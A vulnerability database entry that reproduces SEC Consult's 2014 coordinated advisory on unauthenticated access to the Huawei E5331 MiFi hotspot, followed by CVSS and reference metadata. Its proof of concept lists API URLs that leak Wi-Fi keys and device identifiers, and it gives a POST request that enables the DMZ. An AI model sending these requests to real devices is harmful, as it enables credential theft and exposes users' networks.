VAR-201403-0571
Vulnerability from variot - Updated: 2022-05-17 01:36Huawei E5331 MiFi mobile hotspot is a 3G router device. Huawei E5331 has information disclosure and security bypass vulnerabilities, which allow remote attackers to change the device configuration without having to verify access to the WEB interface URL, obtain configuration information, or submit a specially crafted POST request. Huawei E5331 is a 3G wireless network card from Huawei, China. A security bypass vulnerability and an information disclosure vulnerability exist in Huawei E5331. Attackers can use these vulnerabilities to gain sensitive information or gain access to devices. There are vulnerabilities in Huawei E5331 21.344.11.00.414 version, other versions may also be affected. SEC Consult Vulnerability Lab Security Advisory < 20140307-0 > ======================================================================= title: Unauthenticated access & manipulation of settings product: Huawei E5331 MiFi mobile hotspot vulnerable version: Software version 21.344.11.00.414 fixed version: Software version 21.344.27.00.414 impact: High homepage: http://www.huawei.com found: 2013-12-06 by: J. Greil SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
Vendor description:
"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a multi-mode wireless terminal for SOHO (Small Office and Home Office) and business professionals.
You can connect the E5331 with the USB interface of a computer, or connect the E5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM network, you can surf the Internet and send/receive messages/emails cordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile users can experience many new features and services with the E5331. These features and services will enable a large number of users to use the E5331 and the average revenue per user (ARPU) of operators will increase substantially."
source: http://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272&directoryId=5009&treeId=3619&tab=0
Business recommendation:
All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
The scope of the test, where the vulnerabilities have been identified, was a very short crash-test of the device. It is assumed that further vulnerabilities exist within this product!
The recommendation of SEC Consult is to perform follow-up security tests of this device and similar devices. WLAN passwords in clear text or IMEI information of the SIM card) and even manipulate all settings in the web administration interface! This also works when the "Enable firewall" feature is set in "Firewall Switch" settings of the web interface.
This can even be exploited remotely via Internet depending on the mobile operator setup. E.g. if the operator allows incoming connections for mobile networks, the web interface would be accessible and exploitable publicly.
Otherwise those settings can be manipulated via CSRF attacks too. The DNS name "mobilewifi.home" can be used regardless of the IP address settings.
Proof of concept:
An attacker simply needs to access certain URLs of the web interface in order to receive the configuration. No authentication is needed!
URL for retrieving wireless passwords / PSK in clear text: http://mobilewifi.home/api/wlan/security-settings
XML response:
WPA2-PSK NONE AES 12345 12345 12345 12345 1 XXXXX 0 1 1
Further interesting URLs to retrieve information from (not complete): http://mobilewifi.home/api/wlan/wps (WPS pin) http://mobilewifi.home/api/security/dmz (DMZ host settings) http://mobilewifi.home/api/pin/simlock (enable SIM lock) http://mobilewifi.home/api/wlan/host-list (connected wireless clients) http://mobilewifi.home/api/device/information (IMEI, MAC, etc) [...]
In order to change settings it is also simply possible to issue POST requests to the specific URLs. E.g. change the "DMZ Settings" in order to make internal clients (client IP addresses can be retrieved through the host-list from above) reachable from the outside:
POST /api/security/dmz HTTP/1.1 Host: mobilewifi.home
1A.B.C.D
All those requests can either be issued via CSRF or also from the Internet, if the web interface of the device is reachable (depends on the mobile operator settings).
Vulnerable / tested versions:
The following version of the device has been tested which was the latest version available at the time of identification of the flaw (the automatic update feature did not supply any new version):
Software version: 21.344.11.00.414 Web UI version: 11.001.07.00.03
Vendor contact timeline:
2013-12-11: Contacting vendor through psirt@huawei.com 2013-12-12: Reply from vendor 2013-12-18: Vendor requests some further details, sending answer 2014-01-09: Vendor: problem will be resolved in new firmware version 2014-01-14: Patch is planned for 6th March 2014 2014-03-07: SEC Consult releases coordinated security advisory
Solution:
According to the vendor the following firmware release fixes the identified problems: * Software version 21.344.27.00.414
It contains the following improvements according to the vendor: 1. Users cannot obtain or set any device parameter without logging in. 2. Added server-side authentication to discard illegitimate packets.
The firmware can be downloaded from here: http://consumer.huawei.com/en/support/downloads/index.htm
The item is called: E5331Update_21.344.27.00.414.B757
Workaround:
None
Advisory URL:
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab
SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult? Write to career@sec-consult.com
EOF J. Greil / @2014
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0571",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "e5331 mifi mobile hotspot",
"scope": "eq",
"trust": 0.6,
"vendor": "huawei",
"version": "21.344.11.00.414"
},
{
"model": "e5331",
"scope": "eq",
"trust": 0.3,
"vendor": "huawei",
"version": "21.344.11.00.414"
},
{
"model": "e5331",
"scope": "ne",
"trust": 0.3,
"vendor": "huawei",
"version": "21.344.27.00.414"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"db": "BID",
"id": "66065"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Johannes Greil",
"sources": [
{
"db": "BID",
"id": "66065"
},
{
"db": "PACKETSTORM",
"id": "125598"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
],
"trust": 1.0
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-01615",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2014-01615",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Huawei E5331 MiFi mobile hotspot is a 3G router device. Huawei E5331 has information disclosure and security bypass vulnerabilities, which allow remote attackers to change the device configuration without having to verify access to the WEB interface URL, obtain configuration information, or submit a specially crafted POST request. Huawei E5331 is a 3G wireless network card from Huawei, China. \nA security bypass vulnerability and an information disclosure vulnerability exist in Huawei E5331. Attackers can use these vulnerabilities to gain sensitive information or gain access to devices. There are vulnerabilities in Huawei E5331 21.344.11.00.414 version, other versions may also be affected. SEC Consult Vulnerability Lab Security Advisory \u003c 20140307-0 \u003e\n=======================================================================\n title: Unauthenticated access \u0026 manipulation of settings \n product: Huawei E5331 MiFi mobile hotspot\n vulnerable version: Software version 21.344.11.00.414\n fixed version: Software version 21.344.27.00.414\n impact: High\n homepage: http://www.huawei.com\n found: 2013-12-06\n by: J. Greil\n SEC Consult Vulnerability Lab \n https://www.sec-consult.com\n=======================================================================\n\nVendor description:\n-------------------\n\"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a\nmulti-mode wireless terminal for SOHO (Small Office and Home Office) and\nbusiness professionals. \n\nYou can connect the E5331 with the USB interface of a computer, or connect the\nE5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM\nnetwork, you can surf the Internet and send/receive messages/emails\ncordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile\nusers can experience many new features and services with the E5331. These\nfeatures and services will enable a large number of users to use the E5331 and\nthe average revenue per user (ARPU) of operators will increase substantially.\"\n\nsource:\nhttp://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272\u0026directoryId=5009\u0026treeId=3619\u0026tab=0\n\n\nBusiness recommendation:\n------------------------\nAll discovered vulnerabilities can be exploited without authentication and\ntherefore pose a high security risk. \n\nThe scope of the test, where the vulnerabilities have been identified, was a\nvery short crash-test of the device. It is assumed that further\nvulnerabilities exist within this product!\n\nThe recommendation of SEC Consult is to perform follow-up security tests of\nthis device and similar devices. WLAN passwords in clear text or IMEI information of the SIM card) and\neven manipulate all settings in the web administration interface! This also\nworks when the \"Enable firewall\" feature is set in \"Firewall Switch\" settings\nof the web interface. \n\nThis can even be exploited remotely via Internet depending on the mobile\noperator setup. E.g. if the operator allows incoming connections for mobile\nnetworks, the web interface would be accessible and exploitable publicly. \n\nOtherwise those settings can be manipulated via CSRF attacks too. The DNS name\n\"mobilewifi.home\" can be used regardless of the IP address settings. \n\n\nProof of concept:\n-----------------\nAn attacker simply needs to access certain URLs of the web interface in order\nto receive the configuration. No authentication is needed!\n\nURL for retrieving wireless passwords / PSK in clear text:\nhttp://mobilewifi.home/api/wlan/security-settings\n\nXML response:\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cresponse\u003e\n\u003cWifiAuthmode\u003eWPA2-PSK\u003c/WifiAuthmode\u003e\n\u003cWifiBasicencryptionmodes\u003eNONE\u003c/WifiBasicencryptionmodes\u003e\n\u003cWifiWpaencryptionmodes\u003eAES\u003c/WifiWpaencryptionmodes\u003e\n\u003cWifiWepKey1\u003e12345\u003c/WifiWepKey1\u003e\n\u003cWifiWepKey2\u003e12345\u003c/WifiWepKey2\u003e\n\u003cWifiWepKey3\u003e12345\u003c/WifiWepKey3\u003e\n\u003cWifiWepKey4\u003e12345\u003c/WifiWepKey4\u003e\n\u003cWifiWepKeyIndex\u003e1\u003c/WifiWepKeyIndex\u003e\n\u003cWifiWpapsk\u003eXXXXX\u003c/WifiWpapsk\u003e\n\u003cWifiWpsenbl\u003e0\u003c/WifiWpsenbl\u003e\n\u003cWifiWpscfg\u003e1\u003c/WifiWpscfg\u003e\n\u003cWifiRestart\u003e1\u003c/WifiRestart\u003e\n\u003c/response\u003e\n\n\nFurther interesting URLs to retrieve information from (not complete):\nhttp://mobilewifi.home/api/wlan/wps (WPS pin)\nhttp://mobilewifi.home/api/security/dmz (DMZ host settings)\nhttp://mobilewifi.home/api/pin/simlock (enable SIM lock)\nhttp://mobilewifi.home/api/wlan/host-list (connected wireless clients)\nhttp://mobilewifi.home/api/device/information (IMEI, MAC, etc)\n[...]\n\n\nIn order to change settings it is also simply possible to issue POST requests\nto the specific URLs. E.g. change the \"DMZ Settings\" in order to make internal\nclients (client IP addresses can be retrieved through the host-list from above)\nreachable from the outside:\n\nPOST /api/security/dmz HTTP/1.1\nHost: mobilewifi.home\n\n\u003c?xml version=\"1.0\"\nencoding=\"UTF-8\"?\u003e\u003crequest\u003e\u003cDmzStatus\u003e1\u003c/DmzStatus\u003e\u003cDmzIPAddress\u003eA.B.C.D\u003c/DmzIPAddress\u003e\u003c/request\u003e\n\n\nAll those requests can either be issued via CSRF or also from the Internet, if\nthe web interface of the device is reachable (depends on the mobile operator \nsettings). \n\n\nVulnerable / tested versions:\n-----------------------------\nThe following version of the device has been tested which was the latest\nversion available at the time of identification of the flaw (the automatic\nupdate feature did not supply any new version):\n\nSoftware version: 21.344.11.00.414\nWeb UI version: 11.001.07.00.03\n\n\nVendor contact timeline:\n------------------------\n2013-12-11: Contacting vendor through psirt@huawei.com\n2013-12-12: Reply from vendor\n2013-12-18: Vendor requests some further details, sending answer\n2014-01-09: Vendor: problem will be resolved in new firmware version\n2014-01-14: Patch is planned for 6th March 2014\n2014-03-07: SEC Consult releases coordinated security advisory\n\n\nSolution:\n---------\nAccording to the vendor the following firmware release fixes the identified\nproblems:\n* Software version 21.344.27.00.414\n\nIt contains the following improvements according to the vendor:\n1. Users cannot obtain or set any device parameter without logging in. \n2. Added server-side authentication to discard illegitimate packets. \n\n\nThe firmware can be downloaded from here:\nhttp://consumer.huawei.com/en/support/downloads/index.htm\n\nThe item is called: E5331Update_21.344.27.00.414.B757\n\n\nWorkaround:\n-----------\nNone\n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone: +43 1 8903043 0\nFax: +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nInterested in working with the experts of SEC Consult?\nWrite to career@sec-consult.com\n\nEOF J. Greil / @2014\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-177"
},
{
"db": "BID",
"id": "66065"
},
{
"db": "PACKETSTORM",
"id": "125598"
}
],
"trust": 1.44
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "66065",
"trust": 1.5
},
{
"db": "PACKETSTORM",
"id": "125598",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-01615",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201403-177",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"db": "BID",
"id": "66065"
},
{
"db": "PACKETSTORM",
"id": "125598"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
]
},
"id": "VAR-201403-0571",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
}
]
},
"last_update_date": "2022-05-17T01:36:53.600000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Huawei E5331 has multiple vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/44199"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/125598/sa-20140307-0.txt"
},
{
"trust": 0.6,
"url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140307-0_huawei_e5331_mifi_unauthenticated_access_and_settings_modifications_v10.txt"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/66065"
},
{
"trust": 0.3,
"url": "http://www.huawei.com/"
},
{
"trust": 0.1,
"url": "http://www.huawei.com"
},
{
"trust": 0.1,
"url": "http://mobilewifi.home/api/wlan/host-list"
},
{
"trust": 0.1,
"url": "http://mobilewifi.home/api/pin/simlock"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "http://mobilewifi.home/api/device/information"
},
{
"trust": 0.1,
"url": "http://mobilewifi.home/api/wlan/wps"
},
{
"trust": 0.1,
"url": "http://mobilewifi.home/api/security/dmz"
},
{
"trust": 0.1,
"url": "http://www.huaweidevice.com/worldwide/productfeatures.do?pinfoid=3272\u0026directoryid=5009\u0026treeid=3619\u0026tab=0"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
},
{
"trust": 0.1,
"url": "http://mobilewifi.home/api/wlan/security-settings"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm"
},
{
"trust": 0.1,
"url": "http://consumer.huawei.com/en/support/downloads/index.htm"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"db": "BID",
"id": "66065"
},
{
"db": "PACKETSTORM",
"id": "125598"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"db": "BID",
"id": "66065"
},
{
"db": "PACKETSTORM",
"id": "125598"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"date": "2014-03-07T00:00:00",
"db": "BID",
"id": "66065"
},
{
"date": "2014-03-07T22:41:05",
"db": "PACKETSTORM",
"id": "125598"
},
{
"date": "2014-03-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01615"
},
{
"date": "2014-03-07T00:00:00",
"db": "BID",
"id": "66065"
},
{
"date": "2014-03-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-177"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Huawei E5331 has multiple vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01615"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "66065"
}
],
"trust": 0.3
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.